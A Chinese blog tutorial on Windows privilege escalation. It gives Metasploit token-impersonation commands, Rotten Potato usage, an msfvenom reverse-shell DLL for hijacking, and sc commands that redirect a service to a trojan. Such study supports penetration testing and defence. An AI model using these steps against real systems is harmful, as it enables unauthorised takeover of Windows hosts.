Windows提权篇

最新推荐文章于 2025-04-03 14:32:13 发布
最新推荐文章于 2025-04-03 14:32:13 发布
阅读量311 收藏
点赞数
分类专栏: 渗透测试 文章标签: windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_52178795/article/details/127432607
版权

提权篇

1.令牌窃取

比较老的漏洞利用,针对windows老系统有用。

使用范围:

Microsoft Windows XP Professional SP3 和之前版本

Windows Server 2003 SP2 和之前的版本

Windows Server 2003 x64 和 x64 SP2 Windows Server 2003(用于基于 Itanium 的系统 SP2 和先前版本)

Windows Server 2008 x32 x64 Windows Server 2008(用于基于 Itanium 的系统)

Windows Vista SP1 和之前的版本 Windows Vista x64 SP1 和之前的版

使用手法: 在MSF上有使用的模块

use incognito
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"

 

2.烂土豆提权

使用条件:webshell权限(web服务中间件权限)+烂土豆工具去反弹meterpreter

烂土豆(Rotten Potato) MS16-075 提权是一个本地提权,只针对本地用户,不支持域用户 适用版本:Windows 7、8、10、windows server2008、windows server2012

主要是烂土豆配合令牌窃取提权,

使用过程:在获得webshell之后,上传potato.exez+执行potato.exe+利用窃取模块提升至system权限

烂土豆地址:windows-kernel-exploits/MS16-075 at master · SecWiki/windows-kernel-exploits · GitHub

将烂土豆文件通过工具或者其他方式上传到对方的路径下
upload /root/桌面/potato.exe C:\
 
之后配合MSF进行提权
进入烂土豆目录执行烂土豆
cd C:\\
 
配合令牌窃取
use incognito
list_tokens -u
execute -cH -f ./potato.exe
list_tokens -u
impersonate_token "NT AUTHORITY\\SYSTEM"
​

3.DLL劫持

##不太好用,需要能替换dll文件,dll文件替换后管理员必须启动应用程序

原理:windows程序在启动时候需要dll文件,如果dll文件不存在,则在应用程序中查找,可在应用程序目录下放置恶意dll文件来配合令牌窃取提权

windows应用程序有预定义dll搜索路径:

1.应用程序加载目录

2.C:\Windows\System32

3.C:\Windows\System

4.C:\Windows

5.当前工作目录,CWD

6.在PATH环境变量下的目录(先系统后用户)

#MSF生成dll文件,上传目标主机
msfvenom -p windows/meterpreter/reverse_tcp 
lhost=xx.xxx.xx.xx lport=xx -f dll >/desktop/xx.dll
#之后替换应用程序相应的dll文件
#目标主机应用程序运行后就会监听到,之后进行令牌窃取
list_tokens -u
use incognito
list_tokens -u
impersonate_token "NT AUTHORITY\\SYSTEM"
​

4.不带引号服务路径

配合msf-web,本地提权。(实验:windows-2012),也不太好用,大部分软件都配置规范

原理:

当windows服务运行时,有以下两种情况。如果给出了可执行文件,并且引用路径完整,则系统会按照字面解释并执行它。

但如果服务的二进制路径未包含在引号中,则操作系统将会执行找到的空格分隔的服务路径的第一个实例:

正常服务路径 "C:\Program File\a.exe" -f 引号里面是路径,外面是参数,系统认为引号里面是执行的程序

当没有引号时 C:\Program File\a.exe -f 系统认为第一个空格后面的是参数,导致出错

操作过程:检测引号服务路径,利用路径制作文件并上传,启动或重启服务,调用后成功

检测引号服务路径命令:
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\windows\\" findstr /i /v """

5.不安全的服务权限

本地提权,不好用

原理:由于管理配置错误,用户对服务拥有过多的权限,可以直接修改导致重定向执行文件

过程:检测服务权限配置—制作文件上传—更改服务路径指向—调用后成功

accesschk.exe应用地址:https://learn.microsoft.com/en-us/sysinternals/downloads/accesschk
​
检测服务权限配置
accesschk.exe -uwcqv "administrators" *
更改木马路径指向
sc config "xx.exe" binpath "权限过多的文件"
启动木马文件
sc start xx.exe
windows总结
m0_52329625的博客
01-08 1375
自己总结学习的一些Windows思路,借鉴了许多网上公开的教程思路总结的一文章
网络安全之Windows(上)(高级进阶)
weixin_70911257的博客
06-21 1391
顾名思义就是升我们的限能够让我们去做更多的事,就好比皇帝跟大臣,很多事情只有皇帝能做,大臣做不了例如拟圣旨,掌管虎符,拥有所有人的生杀大,我们的目的就是当皇帝,皇帝做的我们也能做。说一下我的渗透思路吧,首先通过对方服务器的各种漏洞将我们的一句话木马上传至对方的服务器然后通过各种渗透工具连接服务器拿到基本的shell限,然后将升至基本用户限,再通过对方补丁漏洞升至最高限。
windows系统工具.zip
12-25
windows7,windows2003等系统的工具,psexec.exe程序可以实现windows7和2003的,whoami可以在win7上查看当前用户,pinjector是一个进程注入工具,procexp是一个手动查杀病毒的工具可以用来找到被进程注入的进程。
Windows基本原理,各位表哥了解下!
xiaoi123的博客
05-04 2169
Windows基本原理没有多少人谈论在Windows,是一件让人遗憾的事!我想,没有人这么做的理由有以下几点:在渗透测试项目中,客户需要的验证就是一个低限shell。在演示环境,你经常就会得到管理员帐户。meterpreter使你变得懒惰(getsystem = lazy-fu)。最后的评估报告最终变成 – ->nessus安全认证扫描,微软安全基线分析….尽管通常的感觉是,配置...
黑客在Windows系统下的20种主要姿势!黑客技术零基础入门到精通实战教程建议收藏!
资深程序员,曾自学JAVA,C#,如今从业于网安行业
03-06 994
针对以上攻击方法,可以采取以下防范措施来加强系统的安全性:(1)及时更新系统补丁• 定期检查和安装Windows系统及其应用程序的安全更新和补丁,以修复已知的安全漏洞。• 使用自动化工具或配置管理系统来确保补丁的及时部署。(2)强化访问控制和身份验证• 实施严格的访问控制策略,限制对敏感数据和系统的访问。• 使用多因素身份验证方法,如密码、生物识别、硬件令牌等,增加账户的安全性。• 定期审查和更新用户限,确保最小限原则的实施。(3)配置安全策略和服务。
Windows
qq_59102311的博客
05-08 2418
windows限认识(用户及用户组):Windows系统内置了许多本地用户组,这些用户组本身都已经被赋予一些限(permissions),它们具有管理本地计算机或访问本地资源的限。
windows操作系统
weixin_42478365的博客
03-17 198
1.windows整体总结 2.windows基础命令 3.考古之Pr实战
windows系统
weixin_53639243的博客
04-23 4492
方法。
windows服务器安全设置之
09-30
Windows服务器安全设置中的攻击是一个严重的安全问题,尤其在web环境中,攻击者可能会利用系统漏洞通过web应用获取服务器的控制。在网络服务中,攻击通常涉及到 NETWORK SERVICE 账号,以及系统注册表的...
windows-快速查找exp(第一课).docx
04-26
Windows与APT攻防】\n\n在网络安全领域,Windows系统的升(Privilege Escalation)是攻击者常用的手段之一,用于获取系统更高级别的访问限。本将详细讲解如何快速查找并利用公开的exploit(漏洞利用...
111.网络安全渗透测试—[9]—[Windows 2008 R2内核溢出]
qwsn
07-05 3696
在winserver2008 R2中,服务器默认是支持aspx的。所以默认都是可以执行一些命令。如果没有进行补丁修复可以利用一些溢出工具,进行。 这个版本的工具,可以对winserver2008 的系统进行溢出 (2)靶机链接: URL:第一步: 【以上过程略】以下进行过程:第二步: 在winserver2008 R2中,服务器默认是支持aspx的。所以默认都是可以执行一些命令: 第三步: 扫描结果:扫描失败 第四步: 把systeminfo的信息放入该网址中,检索相
windows漏洞
08-02
漏洞
dirtycow漏洞原理图
03-10
自己画的关于脏牛漏洞的原理图,个人感觉比较清晰,适合小白理解用
windows下的
土拨鼠挖洞中的博客
05-01 544
Net user查看当前用户Netuser guest 456修改账户guest密码为456Net user 123 /add添加用户Net localgroupadministrators 123 /add把新用户添加进管理组Net user 123 /active:yes激活用户...
Windows基本原理
Fly_鹏程万里
06-22 2252
前言 没有多少人谈论在Windows,是一件让人遗憾的事!我想,没有人这么做的理由有以下几点: 在渗透测试项目中,客户需要的验证就是一个低限shell。 在演示环境,你经常就会得到管理员帐户。 meterpreter使你变得懒惰(getsystem = lazy-fu)。 最后的评估报告最终变成 – ->nessus安全认证扫描,微软安全基线分析…. 尽管通常的感觉是配置得当的windows是安全的。但是事实真的是这样吗?因此,让我们深入了解Windows操作系统的黑暗角落,...
Window怎么
weixin_42581003的博客
12-27 333
是指在操作系统中获取更高限的过程。在 Windows 系统中,通常有两种方法可以: 使用管理员账户登录系统。在 Windows 系统中,管理员账户具有最高限,可以执行任何操作。如果你的账户是管理员账户,则可以直接使用该账户登录系统。 使用 "管理员" 身份运行某个程序。如果你的账户不是管理员账户,但你希望运行某个程序时具有管理员限,则可以使用 "管理员" 身份运行该程序。要这样做...
黑客在Windows系统下的8种主要姿势,从零基础到精通,收藏这就够了!
最新发布
Libra1313的博客
04-03 1189
Windows的世界里,
windows CVE-2016-3225 CVE-2014-4113 CVE-2020-0787
qq_44905657的博客
01-07 3921
windows 1、搭建环境 我们先使用一个windows server 2012 R2,搭建IIS,弄一个建议网站,传个123.aspx大马 该大马可以执行文件、命令以及上传等操作,但是他有些目录是无法操作的,我们再上传一个6.asp扫描当前指定路径的可操作路径。 其中红色表示文件可替换,蓝色表示目录可写,我们选择一个C:\windows\Temp路径操作 2、各种 我们先使用windows server 2012比较常见的几种方式,CVE-2016-3225 (MS16-075) 当攻
Windows技巧与常见账户类型详解
笔记供了关于Windows的基本概念、用户限分类以及如何在特定情况下操作和限的方法。这对于从事网络安全、系统管理或漏洞修复的专业人员来说,是理解和应对安全威胁的重要参考。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

凉城木槿

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值